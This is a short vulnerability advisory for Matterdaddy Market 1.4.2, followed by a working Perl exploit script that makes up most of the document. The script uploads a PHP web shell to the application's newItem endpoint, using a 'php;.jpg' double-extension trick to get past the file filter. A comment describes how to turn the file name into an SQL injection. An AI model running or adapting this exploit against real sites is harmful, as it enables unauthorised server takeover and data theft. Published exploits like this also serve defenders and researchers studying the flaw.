source: http://www.securityfocus.com/bid/60150/info Matterdaddy Market is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to execute arbitrary script code, upload arbitrary files, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Matterdaddy Market 1.4.2 is vulnerable; other version may also be affected. #!/usr/bin/perl use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common; print <> Provided By KedAns-Dz << | |= e-mail : ked-h[at]hotmail.com | |====================================================| INTRO print "\n"; print "[!] Enter URL(f.e: http://target.com): "; chomp(my $url=); print "\n"; print "[!] Enter File Path (f.e: C:\\Shell.php;.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php;.gif) chomp(my $file=); my $ua = LWP::UserAgent->new; my $re = $ua->request(POST $url.'/controller.php?op=newItem', Content_Type => 'multipart/form-data', Content => [ 'md_title' => '1337day', 'md_description' => 'Inj3ct0r Exploit Database', 'md_price' => '0', 'md_email2' => 'kedans@pene-test.dz', # put u'r email here ! 'city' => 'Hassi Messaoud', 'namer' => 'KedAns-Dz', 'category' => '4', 'filetoupload' => $file, 'filename' => 'k3dsh3ll.php;.jpg', # to make this exploit as sqli change file name to : # k3dsh3ll' [+ SQLi +].php.jpg # use temperdata better ;) ] ); print "\n"; if($re->is_success) { if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; } else { print "[!] Check your email and confirm u'r post! \n"; } } else { print "[-] HTTP request Failed!\n"; } exit;